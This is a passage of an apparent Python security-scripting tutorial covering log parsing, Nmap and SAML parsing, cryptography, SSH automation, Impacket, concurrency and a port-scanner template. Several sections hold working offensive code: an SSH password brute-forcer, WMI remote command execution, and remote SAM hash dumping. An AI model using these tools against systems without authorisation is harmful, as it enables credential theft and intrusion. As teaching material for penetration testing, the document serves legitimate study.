    with open(filepath, encoding="utf-8", errors="replace") as f:
        for line in f:
            match = APACHE_LOG.match(line)
            if not match:
                continue

            ip = match.group("ip")
            path = match.group("path")
            status = match.group("status")

            ip_counter[ip] += 1

            # Check for SQL injection / traversal attempts
            # (each request is recorded at most once)
            path_lower = path.lower()
            if any(keyword in path_lower for keyword in suspicious_keywords):
                suspicious_paths.append((ip, path, status))

            # Check for authentication failures
            if status in ["401", "403"] and "login" in path_lower:
                failed_logins.append((ip, path))

    return {
        "top_ips": ip_counter.most_common(20),
        "suspicious_requests": suspicious_paths,
        "failed_logins": failed_logins
    }

9. JSON and XML Parsing

JSON (API Responses)

import json

# Parse API response
def parse_api_response(response_text):
    """Decode a JSON API response and return its "results" entry.

    Returns:
        The value stored under "results" (an empty list when the key is
        absent or the document is not an object), or None when
        ``response_text`` is not valid JSON (the error is printed).
    """
    try:
        document = json.loads(response_text)
    except json.JSONDecodeError as e:
        print(f"[!] Invalid JSON: {e}")
        return None

    def safe_get(node, *path, default=None):
        """Walk ``path`` through nested dicts/lists without raising."""
        for step in path:
            if isinstance(node, dict):
                node = node.get(step, default)
                continue
            if isinstance(node, list) and isinstance(step, int):
                node = node[step] if step < len(node) else default
                continue
            # Neither a dict nor an indexable list: the path is a dead end.
            return default
        return node

    # Example: extract user data
    return safe_get(document, "results", default=[])

# Pretty-print JSON for analysis
def print_json(data):
    """Print ``data`` as 2-space-indented JSON.

    Values that are not JSON-serializable are converted with ``str``.
    """
    rendered = json.dumps(data, default=str, indent=2)
    print(rendered)

XML (Nmap Output, SAML, SOAP)

import xml.etree.ElementTree as ET

def parse_nmap_xml(xml_file):
    """Parse an Nmap XML report into a list of host dictionaries.

    Args:
        xml_file: Path or file object accepted by ``ET.parse``.

    Returns:
        One dict per <host> with "ip", "state" and "ports". Each port dict
        has "port" (int), "protocol", "state", "service", "product" and
        "version", plus "scripts" (script id -> output) when the port has
        script results. Service fields are "" when <service> is absent.
    """
    def service_attr(node, name):
        return node.get(name, "") if node is not None else ""

    hosts = []
    for host_el in ET.parse(xml_file).getroot().findall("host"):
        port_entries = []
        record = {
            "ip": host_el.find("address").get("addr"),
            "state": host_el.find("status").get("state"),
            "ports": port_entries,
        }

        for port_el in host_el.findall(".//port"):
            service_el = port_el.find("service")
            entry = {
                "port": int(port_el.get("portid")),
                "protocol": port_el.get("protocol"),
                "state": port_el.find("state").get("state"),
                "service": service_attr(service_el, "name"),
                "product": service_attr(service_el, "product"),
                "version": service_attr(service_el, "version"),
            }

            # Attach NSE script output only when there is some.
            script_output = {
                script_el.get("id"): script_el.get("output")
                for script_el in port_el.findall("script")
            }
            if script_output:
                entry["scripts"] = script_output

            port_entries.append(entry)

        hosts.append(record)

    return hosts

# Parse SAML assertions (for security testing)
def extract_saml_attributes(saml_response_xml):
    """Collect attribute names and values from a SAML 2.0 response.

    Args:
        saml_response_xml: The response document as an XML string.

    Returns:
        A dict mapping each Attribute's ``Name`` to the list of texts of
        its AttributeValue children. A repeated name keeps the last one.
    """
    namespaces = {
        "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
        "samlp": "urn:oasis:names:tc:SAML:2.0:protocol"
    }
    document = ET.fromstring(saml_response_xml)
    return {
        node.get("Name"): [
            value.text
            for value in node.findall("saml:AttributeValue", namespaces)
        ]
        for node in document.findall(".//saml:Attribute", namespaces)
    }

10. Cryptography Library

Hashing

import hashlib

def hash_string(text, algorithm="sha256"):
    """Return the hex digest of ``text`` (UTF-8 encoded).

    Args:
        text: String to hash.
        algorithm: Any algorithm name accepted by ``hashlib.new``.
    """
    digest = hashlib.new(algorithm)
    payload = text.encode()
    digest.update(payload)
    return digest.hexdigest()

def hash_file(filepath, algorithm="sha256"):
    """Return the hex digest of a file's contents.

    The file is read in 8 KiB chunks, so large files are never loaded
    into memory in one piece.
    """
    digest = hashlib.new(algorithm)
    with open(filepath, "rb") as handle:
        # iter() with a sentinel keeps calling read() until it returns b"".
        for block in iter(lambda: handle.read(8192), b""):
            digest.update(block)
    return digest.hexdigest()

# Common hash types
# The same input hashed with four algorithms, to compare digest lengths.
text = "password123"
print(f"MD5:    {hash_string(text, 'md5')}")
print(f"SHA1:   {hash_string(text, 'sha1')}")
print(f"SHA256: {hash_string(text, 'sha256')}")
print(f"SHA512: {hash_string(text, 'sha512')}")

AES Encryption/Decryption

from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import base64

def aes_encrypt(plaintext, key):
    """Encrypt text with AES in CBC mode under a fresh random IV.

    Args:
        plaintext: String to encrypt (UTF-8 encoded, then padded).
        key: AES key bytes; a 32-byte key gives AES-256.

    Returns:
        Base64 text of the 16-byte IV followed by the ciphertext.

    NOTE(review): CBC provides confidentiality only; the output is not
    authenticated.
    """
    init_vector = get_random_bytes(16)
    encryptor = AES.new(key, AES.MODE_CBC, init_vector)
    padded = pad(plaintext.encode(), AES.block_size)
    blob = init_vector + encryptor.encrypt(padded)
    return base64.b64encode(blob).decode()

def aes_decrypt(encrypted_b64, key):
    """Reverse ``aes_encrypt``: base64-decode, split off the IV, decrypt.

    Args:
        encrypted_b64: Base64 text holding the 16-byte IV plus ciphertext.
        key: The AES key bytes used for encryption.

    Returns:
        The decrypted text with padding removed.
    """
    blob = base64.b64decode(encrypted_b64)
    init_vector, body = blob[:16], blob[16:]
    decryptor = AES.new(key, AES.MODE_CBC, init_vector)
    padded = decryptor.decrypt(body)
    return unpad(padded, AES.block_size).decode()

# Usage: round-trip a message. Each aes_encrypt call picks a new random IV,
# so encrypting the same text twice prints different ciphertext.
key = get_random_bytes(32)  # 256-bit key
encrypted = aes_encrypt("Sensitive data here", key)
decrypted = aes_decrypt(encrypted, key)
print(f"Encrypted: {encrypted}")
print(f"Decrypted: {decrypted}")

RSA Key Generation and Usage

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256

# Generate RSA key pair (2048-bit modulus)
key = RSA.generate(2048)
# Serialized forms of both halves; these are what the helper functions
# below pass to RSA.import_key().
private_key = key.export_key()
public_key = key.publickey().export_key()

# Encrypt with public key
def rsa_encrypt(plaintext, pub_key_pem):
    """Encrypt a string with RSA-OAEP under the given public key.

    Returns:
        The ciphertext bytes.
    """
    recipient_key = RSA.import_key(pub_key_pem)
    oaep = PKCS1_OAEP.new(recipient_key)
    message = plaintext.encode()
    return oaep.encrypt(message)

# Decrypt with private key
def rsa_decrypt(ciphertext, priv_key_pem):
    """Decrypt RSA-OAEP ciphertext with the private key and return text."""
    own_key = RSA.import_key(priv_key_pem)
    oaep = PKCS1_OAEP.new(own_key)
    recovered = oaep.decrypt(ciphertext)
    return recovered.decode()

# Sign and verify
def sign_data(data, priv_key_pem):
    """Sign the SHA-256 digest of ``data`` with PKCS#1 v1.5.

    Returns:
        The signature bytes.
    """
    signing_key = RSA.import_key(priv_key_pem)
    digest = SHA256.new(data.encode())
    return pkcs1_15.new(signing_key).sign(digest)

def verify_signature(data, signature, pub_key_pem):
    """Check a PKCS#1 v1.5 signature over the SHA-256 digest of ``data``.

    Returns:
        True when the signature verifies, False when verification raises
        ValueError or TypeError.
    """
    verifying_key = RSA.import_key(pub_key_pem)
    digest = SHA256.new(data.encode())
    try:
        pkcs1_15.new(verifying_key).verify(digest, signature)
    except (ValueError, TypeError):
        return False
    else:
        return True

Password Hashing (bcrypt)

import bcrypt

def hash_password(password):
    """Return a bcrypt hash of ``password`` using a new salt (12 rounds)."""
    fresh_salt = bcrypt.gensalt(rounds=12)
    secret = password.encode()
    return bcrypt.hashpw(secret, fresh_salt)

def verify_password(password, hashed):
    """Return whether ``password`` matches the bcrypt hash ``hashed``."""
    candidate = password.encode()
    return bcrypt.checkpw(candidate, hashed)

# Usage: hash once, then check a matching and a non-matching password.
# hash_password returns bytes, hence the .decode() for printing.
hashed = hash_password("my_secure_password")
print(f"Hash: {hashed.decode()}")
print(f"Valid: {verify_password('my_secure_password', hashed)}")
print(f"Invalid: {verify_password('wrong_password', hashed)}")

11. Paramiko — SSH Automation

SSH Command Execution

import paramiko

def ssh_execute(hostname, username, password=None, key_file=None,
                command="id", port=22):
    """Execute a command over SSH.

    Args:
        hostname: Server to connect to.
        username: Login name.
        password: Password, used when ``key_file`` is not given.
        key_file: Path to a private key file; takes precedence over
            ``password``.
        command: Command line to run on the remote host.
        port: SSH port.

    Returns:
        ``{"stdout", "stderr", "exit_code"}`` on success, or
        ``{"error": message}`` when connecting, authenticating or running
        the command fails.
    """
    client = paramiko.SSHClient()
    # NOTE: AutoAddPolicy accepts unknown host keys without verification.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        connect_kwargs = {
            "hostname": hostname,
            "port": port,
            "username": username,
            "timeout": 10,
        }
        if key_file:
            connect_kwargs["key_filename"] = key_file
        else:
            connect_kwargs["password"] = password

        client.connect(**connect_kwargs)
        stdin, stdout, stderr = client.exec_command(command)

        # Decode leniently: binary or non-UTF-8 output must not raise and
        # be misreported as a connection error by the handler below.
        return {
            "stdout": stdout.read().decode(errors="replace"),
            "stderr": stderr.read().decode(errors="replace"),
            "exit_code": stdout.channel.recv_exit_status()
        }
    except paramiko.AuthenticationException:
        return {"error": "Authentication failed"}
    except paramiko.SSHException as e:
        return {"error": f"SSH error: {e}"}
    except Exception as e:
        return {"error": f"Connection error: {e}"}
    finally:
        client.close()

# Usage
result = ssh_execute("192.168.1.10", "admin", password="admin123",
                     command="uname -a")
# On failure ssh_execute returns {"error": ...} with no "stdout" key.
if "error" in result:
    print(f"[!] {result['error']}")
else:
    print(result["stdout"])

SSH Brute Forcer

import paramiko
import threading
from queue import Queue

def ssh_brute(hostname, username, wordlist_path, port=22, threads=5):
    """Attempt SSH logins with each password from a wordlist.

    Args:
        hostname: Host running the SSH service.
        username: Account name to authenticate as.
        wordlist_path: Text file with one candidate password per line
            (surrounding whitespace is stripped from each line).
        port: TCP port of the SSH service.
        threads: Number of worker threads pulling from the wordlist.

    Returns:
        The password that authenticated, or ``None`` when the wordlist is
        exhausted without a successful login.
    """
    from queue import Empty

    found = threading.Event()
    matches = []  # filled by the worker whose login succeeds
    password_queue = Queue()

    with open(wordlist_path) as f:
        for line in f:
            password_queue.put(line.strip())

    def try_login():
        while not found.is_set():
            # get_nowait() avoids the empty()/get() race in which another
            # worker drains the queue and this one blocks forever.
            try:
                password = password_queue.get_nowait()
            except Empty:
                return

            client = paramiko.SSHClient()
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            try:
                client.connect(hostname, port=port, username=username,
                               password=password, timeout=3,
                               banner_timeout=3, auth_timeout=3)
            except paramiko.AuthenticationException:
                pass  # Wrong password
            except Exception:
                pass  # Connection error; this candidate is not retried
            else:
                found.set()
                matches.append(password)
                print(f"[+] FOUND: {username}:{password}")
            finally:
                client.close()

    workers = [
        threading.Thread(target=try_login, daemon=True)
        for _ in range(threads)
    ]
    for worker in workers:
        worker.start()

    # Join the threads, not the queue: after a hit the remaining entries are
    # never consumed, so Queue.join() would block forever.
    for worker in workers:
        worker.join()

    return matches[0] if matches else None

SFTP File Operations

import paramiko

def sftp_operations(hostname, username, password, port=22):
    """Demonstrate SFTP file operations against a remote host.

    Lists ``/tmp``, downloads ``/etc/passwd`` to ``downloaded_passwd.txt``,
    uploads ``local_script.sh`` to ``/tmp/uploaded_script.sh`` and prints
    the content of ``/etc/hostname``.

    Args:
        hostname: Host running the SSH/SFTP service.
        username: Account name used for authentication.
        password: Password for ``username``.
        port: TCP port of the SSH service.
    """
    transport = paramiko.Transport((hostname, port))
    sftp = None

    try:
        # Authentication and SFTP start-up sit inside the try so the
        # transport is closed even when either of them fails.
        transport.connect(username=username, password=password)
        sftp = paramiko.SFTPClient.from_transport(transport)

        # List directory
        files = sftp.listdir("/tmp")
        print(f"Files in /tmp: {files[:10]}")

        # Download file
        sftp.get("/etc/passwd", "downloaded_passwd.txt")

        # Upload file
        sftp.put("local_script.sh", "/tmp/uploaded_script.sh")

        # Read file content
        with sftp.open("/etc/hostname", "r") as f:
            hostname_content = f.read().decode()
            print(f"Hostname: {hostname_content.strip()}")

    finally:
        if sftp is not None:
            sftp.close()
        transport.close()

12. Impacket Basics

SMB Enumeration

from impacket.smbconnection import SMBConnection

def smb_enumerate(target, username="", password="", domain=""):
    """Enumerate SMB shares and basic server information.

    Logs in with the given credentials (or a null session when ``username``
    is empty), prints the server OS, domain and hostname, then lists every
    share together with up to five entries from its root.

    Args:
        target: Host to connect to on port 445.
        username: Account name; empty for a null session.
        password: Password for ``username``.
        domain: Authentication domain.
    """
    conn = None
    try:
        conn = SMBConnection(target, target, sess_port=445)

        if username:
            conn.login(username, password, domain)
        else:
            conn.login("", "")  # Null session

        print(f"[*] OS: {conn.getServerOS()}")
        print(f"[*] Domain: {conn.getServerDomain()}")
        print(f"[*] Hostname: {conn.getServerName()}")

        # List shares
        shares = conn.listShares()
        print("\n[*] Shares:")
        for share in shares:
            name = share["shi1_netname"][:-1]  # Remove null byte
            comment = share["shi1_remark"][:-1]
            print(f"  {name:<20} {comment}")

            # Try to list files in share
            try:
                files = conn.listPath(name, "*")
                for f in files[:5]:
                    print(f"    -> {f.get_longname()}")
            except Exception:
                print("    -> [Access Denied]")
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        # Release the session on failure too, not only on the success path.
        if conn is not None:
            try:
                conn.close()
            except Exception:
                pass  # connection already gone; nothing left to release

Executing Commands via WMI

from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import WBEM_FLAG_FORWARD_ONLY
import impacket.dcerpc.v5.dcom.wmi as wmi

def wmi_exec(target, username, password, domain, command):
    """Execute a command on a remote host via WMI (``Win32_Process.Create``).

    Args:
        target: Host to connect to.
        username: Account name used for authentication.
        password: Password for ``username``.
        domain: Authentication domain.
        command: Command line handed to ``Win32_Process.Create``; it is
            started with ``C:\\`` as its working directory.

    Failures are reported on stdout; nothing is returned.
    """
    dcom = None
    try:
        dcom = DCOMConnection(target, username, password, domain)
        iInterface = dcom.CoCreateInstanceEx(
            wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
        )
        iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
        iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", None, None)
        iWbemLevel1Login.RemRelease()

        win32_process, _ = iWbemServices.GetObject("Win32_Process")
        win32_process.Create(command, "C:\\", None)

        print(f"[+] Command executed on {target}: {command}")
    except Exception as e:
        print(f"[!] WMI exec failed: {e}")
    finally:
        # Disconnect on failure too, so the DCOM connection is not left open.
        if dcom is not None:
            try:
                dcom.disconnect()
            except Exception as e:
                print(f"[!] DCOM disconnect failed: {e}")

Secretsdump (Hash Extraction)

# Impacket's secretsdump functionality (conceptual usage)
# In practice, use the command-line tool:
#   secretsdump.py domain/user:password@target

from impacket.examples.secretsdump import RemoteOperations, SAMHashes

def dump_sam(target, username, password, domain=""):
    """Dump SAM hashes from a remote Windows host.

    Connects over SMB, enables remote registry access, saves the SAM hive
    and prints/exports the hashes it contains.

    Args:
        target: Host to connect to.
        username: Account name used for authentication.
        password: Password for ``username``.
        domain: Authentication domain.

    Failures are reported on stdout; nothing is returned.
    """
    conn = None
    remote_ops = None
    try:
        from impacket.smbconnection import SMBConnection

        conn = SMBConnection(target, target)
        conn.login(username, password, domain)

        remote_ops = RemoteOperations(conn, False)
        remote_ops.enableRegistry()

        # Ask for the boot key through the public accessor. The private
        # attribute is only populated once getBootKey() has run, so reading
        # it directly yields an empty key.
        boot_key = remote_ops.getBootKey()

        sam_hashes = SAMHashes(
            remote_ops.saveSAM(),
            boot_key,
            isRemote=True
        )
        sam_hashes.dump()
        sam_hashes.export("sam_hashes.txt")
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        # Clean up on failure too: release remote registry state first,
        # then the SMB session.
        if remote_ops is not None:
            try:
                remote_ops.finish()
            except Exception as e:
                print(f"[!] Error: {e}")
        if conn is not None:
            try:
                conn.logoff()
            except Exception as e:
                print(f"[!] Error: {e}")

13. Multithreading and Concurrency

Thread Pool Pattern

from concurrent.futures import ThreadPoolExecutor, as_completed
import threading

def scan_target(target):
    """Stand-in scanner: report ``target`` as open without probing it."""
    # ... scanning logic ...
    outcome = {"target": target}
    outcome["status"] = "open"
    return outcome

def parallel_scan(targets, max_workers=50):
    """Scan multiple targets in parallel with a thread pool.

    Args:
        targets: Iterable of targets, each passed to ``scan_target``.
        max_workers: Upper bound on concurrently running scans.

    Returns:
        list: Results of the scans that finished without raising, in
        completion order. Failures are printed and skipped.
    """
    results = []

    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        future_to_target = {
            executor.submit(scan_target, target): target
            for target in targets
        }

        # as_completed() only yields finished futures and this loop runs in
        # the calling thread alone, so neither a result timeout nor a lock
        # around the append is needed.
        for future in as_completed(future_to_target):
            target = future_to_target[future]
            try:
                results.append(future.result())
            except Exception as e:
                print(f"[!] {target}: {e}")

    return results

Async Pattern (for high-volume I/O)

import asyncio
import aiohttp

async def async_check_url(session, url):
    """Fetch ``url`` through ``session`` and summarise the response.

    Returns a dict with ``url``, ``status`` and ``size`` (length of the
    response text) on success, or ``url`` and ``error`` when anything fails.
    The request uses a 5 second total timeout and ``ssl=False``.
    """
    try:
        request_timeout = aiohttp.ClientTimeout(total=5)
        async with session.get(url, timeout=request_timeout,
                               ssl=False) as resp:
            status_code = resp.status
            body = await resp.text()
            return {"url": url, "status": status_code, "size": len(body)}
    except Exception as exc:
        return {"url": url, "error": str(exc)}

async def async_url_checker(urls, concurrency=50):
    """Check every URL in ``urls`` with at most ``concurrency`` in flight.

    Returns the per-URL results from ``async_check_url`` in the same order
    as ``urls``.
    """
    gate = asyncio.Semaphore(concurrency)

    async def bounded_check(session, url):
        # Hold a semaphore slot for the duration of one request.
        async with gate:
            return await async_check_url(session, url)

    async with aiohttp.ClientSession() as session:
        pending = [bounded_check(session, target_url) for target_url in urls]
        return await asyncio.gather(*pending)

# Usage
# urls = ["http://target.com/page1", "http://target.com/page2", ...]
# results = asyncio.run(async_url_checker(urls))

Rate-Limited Scanner

import threading
import time

class RateLimiter:
    """Token bucket rate limiter.

    Tokens are refilled continuously at ``rate_per_second``. The bucket
    holds at most ``max(1, rate_per_second)`` tokens, so rates below one
    request per second can still accumulate the single token a request
    needs.

    Raises:
        ValueError: if ``rate_per_second`` is not positive.
    """
    def __init__(self, rate_per_second):
        if rate_per_second <= 0:
            raise ValueError("rate_per_second must be positive")
        self.rate = rate_per_second
        # Capacity must be at least one token; capping at a rate below 1
        # would make acquire() fail forever and wait() never return.
        self.capacity = max(1, rate_per_second)
        self.tokens = self.capacity
        self.lock = threading.Lock()
        # Monotonic clock: wall-clock adjustments must not grant or
        # withhold tokens.
        self.last_time = time.monotonic()

    def acquire(self):
        """Take one token if available; return True on success, else False."""
        with self.lock:
            now = time.monotonic()
            elapsed = now - self.last_time
            self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
            self.last_time = now
            if self.tokens >= 1:
                self.tokens -= 1
                return True
            return False

    def wait(self):
        """Block, polling every 10 ms, until a token has been acquired."""
        while not self.acquire():
            time.sleep(0.01)

# Usage with scanning
# One module-level limiter is shared by every call to rate_limited_scan().
limiter = RateLimiter(100)  # 100 requests/second

def rate_limited_scan(target):
    """Wait for a token from the shared ``limiter`` before scanning ``target``."""
    limiter.wait()
    # ... perform scan ...

14. Error Handling Patterns

Robust Network Error Handling

import socket
import requests
import time
import functools

def retry(max_attempts=3, delay=1, backoff=2, exceptions=(Exception,)):
    """Decorator for retrying functions with exponential backoff.

    Args:
        max_attempts: Total number of calls to make before giving up.
        delay: Seconds to sleep before the first retry.
        backoff: Factor the delay is multiplied by after every retry.
        exceptions: Exception types that trigger a retry; anything else
            propagates immediately.

    Returns:
        A decorator. The wrapped function returns the first successful
        result and re-raises the last exception once attempts run out.

    Raises:
        ValueError: if ``max_attempts`` is less than 1. Without this check
            the wrapped function would never be called and would silently
            return ``None``.
    """
    if max_attempts < 1:
        raise ValueError("max_attempts must be at least 1")

    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            current_delay = delay
            for attempt in range(1, max_attempts + 1):
                try:
                    return func(*args, **kwargs)
                except exceptions as e:
                    if attempt == max_attempts:
                        raise
                    print(f"[*] Retry {attempt}/{max_attempts} "
                          f"after {current_delay}s: {e}")
                    time.sleep(current_delay)
                    current_delay *= backoff
        return wrapper
    return decorator

@retry(max_attempts=3, delay=1,
       exceptions=(requests.ConnectionError, requests.Timeout))
def resilient_request(url):
    """GET ``url`` with a 5 second timeout.

    Connection errors and timeouts are retried by the ``retry`` decorator,
    up to three attempts in total.
    """
    response = requests.get(url, timeout=5)
    return response

# Comprehensive network error handling
def safe_connect(target, port, timeout=3):
    """Open a TCP connection, reporting common failures instead of raising.

    Args:
        target: Host name or IPv4 address to connect to.
        port: TCP port number.
        timeout: Socket timeout in seconds.

    Returns:
        The connected socket (the caller must close it), or ``None`` when
        the connection failed; the reason is printed.
    """
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sock.connect((target, port))
        return sock
    except socket.timeout:
        print(f"[-] {target}:{port} — Connection timed out")
    except ConnectionRefusedError:
        print(f"[-] {target}:{port} — Connection refused")
    except socket.gaierror:
        print(f"[-] {target} — DNS resolution failed")
    except PermissionError:
        print(f"[-] {target}:{port} — Permission denied (firewall?)")
    except OSError as e:
        print(f"[-] {target}:{port} — OS error: {e}")

    # Only reached after a handled failure: release the descriptor so that
    # repeated failed attempts do not leak sockets.
    if sock is not None:
        sock.close()
    return None

15. Output Formatting and Logging

Colored Terminal Output

from colorama import Fore, Style, init

init(autoreset=True)  # Auto-reset colors after each print

def print_success(msg):
    """Print ``msg`` behind a green ``[+]`` marker."""
    marker = f"{Fore.GREEN}[+]{Style.RESET_ALL}"
    print(f"{marker} {msg}")

def print_error(msg):
    """Print ``msg`` behind a red ``[-]`` marker."""
    marker = f"{Fore.RED}[-]{Style.RESET_ALL}"
    print(f"{marker} {msg}")

def print_info(msg):
    """Print ``msg`` behind a blue ``[*]`` marker."""
    marker = f"{Fore.BLUE}[*]{Style.RESET_ALL}"
    print(f"{marker} {msg}")

def print_warning(msg):
    """Print ``msg`` behind a yellow ``[!]`` marker."""
    marker = f"{Fore.YELLOW}[!]{Style.RESET_ALL}"
    print(f"{marker} {msg}")

def print_banner(tool_name, version="1.0"):
    """Print a cyan banner: a 50-character rule, the tool name and version,
    and a closing rule followed by a colour reset."""
    rule = "=" * 50
    print(f"""
{Fore.CYAN}{rule}
  {tool_name} v{version}
  {rule}{Style.RESET_ALL}
""")

Structured Logging

import logging
from datetime import datetime

def setup_logger(name, log_file=None, level=logging.INFO):
    """Configure logging for security tools.

    The function is safe to call repeatedly for the same ``name``: a
    console handler is attached only once, and a file handler only once
    per log file, so messages are never emitted in duplicate.

    Args:
        name: Logger name passed to ``logging.getLogger``.
        log_file: Optional path of a file to log to in addition to the
            console.
        level: Level set on the logger.

    Returns:
        logging.Logger: the configured logger.
    """
    import os  # local import: only needed to normalise ``log_file``

    logger = logging.getLogger(name)
    logger.setLevel(level)

    formatter = logging.Formatter(
        "%(asctime)s | %(levelname)-8s | %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S"
    )

    # Console handler. FileHandler subclasses StreamHandler, so it is
    # excluded explicitly when looking for an existing console handler.
    has_console = any(
        isinstance(handler, logging.StreamHandler)
        and not isinstance(handler, logging.FileHandler)
        for handler in logger.handlers
    )
    if not has_console:
        console = logging.StreamHandler()
        console.setFormatter(formatter)
        logger.addHandler(console)

    # File handler (optional)
    if log_file:
        log_path = os.path.abspath(log_file)
        has_file = any(
            isinstance(handler, logging.FileHandler)
            and handler.baseFilename == log_path
            for handler in logger.handlers
        )
        if not has_file:
            file_handler = logging.FileHandler(log_file)
            file_handler.setFormatter(formatter)
            logger.addHandler(file_handler)

    return logger

# Usage
# A log file name is given, so records go to the console and to
# scan_results.log.
log = setup_logger("scanner", "scan_results.log")
log.info("Starting scan against 192.168.1.0/24")
log.warning("Port 445 (SMB) is open — check for EternalBlue")
log.error("Connection to 192.168.1.50 failed")

Table Output

from tabulate import tabulate

def display_results(results):
    """Print ``results`` as a grid table.

    Every entry must provide the keys ``host``, ``port``, ``state``,
    ``service`` and ``version``; one table row is produced per entry.
    """
    columns = ("host", "port", "state", "service", "version")
    headers = ["Host", "Port", "State", "Service", "Version"]
    rows = [[entry[column] for column in columns] for entry in results]
    table = tabulate(rows, headers=headers, tablefmt="grid")
    print(table)

# Example output:
# +---------------+------+-------+----------+-----------+
# | Host          | Port | State | Service  | Version   |
# +===============+======+=======+==========+===========+
# | 192.168.1.10  | 22   | open  | ssh      | OpenSSH 8 |
# | 192.168.1.10  | 80   | open  | http     | Apache 2  |
# | 192.168.1.10  | 443  | open  | https    | nginx 1.2 |
# +---------------+------+-------+----------+-----------+

16. Common Security Script Patterns

Complete Tool Template

#!/usr/bin/env python3
"""
PortHunter — Fast TCP Port Scanner
Author: Security Student
Usage: python3 porthunter.py -t TARGET -p PORTS [options]
"""

import argparse
import socket
import sys
import time
import threading
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime

# colorama is optional. When it is missing, Fore and Style are replaced by a
# stub whose attributes are empty strings, so expressions such as Fore.CYAN
# still evaluate instead of raising NameError before the colour helper runs.
try:
    from colorama import Fore, Style, init
    init(autoreset=True)
    HAS_COLOR = True
except ImportError:
    HAS_COLOR = False

    class _NoColor:
        """Stand-in for colorama's Fore/Style: every code is an empty string."""

        def __getattr__(self, name):
            if name.startswith("_"):
                raise AttributeError(name)
            return ""

    Fore = Style = _NoColor()

# --- Configuration ---
# Version string shown in the banner.
VERSION = "1.0.0"
# Default for --timeout: per-port socket timeout, in seconds.
DEFAULT_TIMEOUT = 1.0
# Default for --threads: size of the scanning thread pool.
DEFAULT_THREADS = 100

# --- Helper Functions ---
def color(text, color_code):
    """Wrap ``text`` in ``color_code`` and a reset sequence.

    When colour support is unavailable, ``text`` is returned unchanged.
    """
    if not HAS_COLOR:
        return text
    return f"{color_code}{text}{Style.RESET_ALL}"

def banner():
    """Print the tool name and version followed by a rule, both in cyan."""
    title_line = f"\n  PortHunter v{VERSION}"
    rule_line = f"  {'─' * 30}\n"
    for line in (title_line, rule_line):
        print(color(line, Fore.CYAN))

def parse_ports(spec):
    """Expand a port specification into a sorted list of unique ports.

    The specification is a comma-separated list of single ports and
    inclusive ``start-end`` ranges, e.g. ``"22,80,8000-8010"``. Whitespace
    around entries and empty entries (``"22,,80"``, trailing commas) are
    ignored.

    Args:
        spec: Port specification string.

    Returns:
        list[int]: Ascending ports without duplicates.

    Raises:
        ValueError: if an entry is not numeric, lies outside 1-65535, is a
            range whose start exceeds its end, or if no port is given.
    """
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue  # tolerate stray or trailing commas

        if "-" in part:
            low_text, _, high_text = part.partition("-")
            start, end = int(low_text), int(high_text)
        else:
            start = end = int(part)

        if start > end:
            raise ValueError(f"invalid port range (start > end): {part}")
        if start < 1 or end > 65535:
            raise ValueError(f"port out of range 1-65535: {part}")
        ports.update(range(start, end + 1))

    if not ports:
        raise ValueError("no ports specified")
    return sorted(ports)

# --- Core Logic ---
def scan_port(target, port, timeout):
    """Probe one TCP port and try to grab a banner.

    Args:
        target: Host name or IPv4 address to probe.
        port: TCP port number.
        timeout: Socket timeout in seconds, used for the connect and for
            the banner read.

    Returns:
        dict: ``{"port", "state": "open", "banner"}`` when the port accepts
        a connection (``banner`` is ``""`` if nothing could be read), or
        ``None`` when the port is not open or the probe failed.
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((target, port)) != 0:
                return None

            # Banner grabbing is best-effort: a silent or resetting service
            # still counts as an open port.
            try:
                s.send(b"\r\n")
                banner_text = s.recv(1024).decode(errors="replace").strip()
            except OSError:
                banner_text = ""
            return {"port": port, "state": "open", "banner": banner_text}
    except (OSError, OverflowError):
        # OSError covers socket-level failures, OverflowError a port number
        # outside 0-65535. Unlike a bare ``except``, KeyboardInterrupt and
        # SystemExit still propagate.
        return None

def main():
    """Command-line entry point: parse arguments, scan, report, and save.

    Scans the requested ports of the target with a thread pool, prints
    every open port as it is found, and optionally writes a JSON report.
    Invalid ``--ports`` or ``--threads`` values end the program with an
    argparse usage error; an unresolvable target exits with status 1.
    """
    parser = argparse.ArgumentParser(description="Fast TCP Port Scanner")
    parser.add_argument("-t", "--target", required=True, help="Target host")
    parser.add_argument("-p", "--ports", default="1-1024", help="Port spec")
    parser.add_argument("--threads", type=int, default=DEFAULT_THREADS)
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
    parser.add_argument("-o", "--output", help="Output JSON file")
    parser.add_argument("-q", "--quiet", action="store_true")
    args = parser.parse_args()

    # Validate user input up front so mistakes produce a usage message
    # rather than a traceback in the middle of the scan.
    try:
        ports = parse_ports(args.ports)
    except ValueError as exc:
        parser.error(f"invalid port specification {args.ports!r}: {exc}")
    if args.threads < 1:
        parser.error("--threads must be at least 1")

    if not args.quiet:
        banner()

    target = args.target

    # Resolve hostname
    try:
        target_ip = socket.gethostbyname(target)
    except socket.gaierror:
        print(color(f"[-] Cannot resolve: {target}", Fore.RED))
        sys.exit(1)

    print(f"[*] Scanning {target} ({target_ip}) — {len(ports)} ports")
    start_time = time.time()

    results = []
    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = {
            executor.submit(scan_port, target_ip, port, args.timeout): port
            for port in ports
        }
        for future in as_completed(futures):
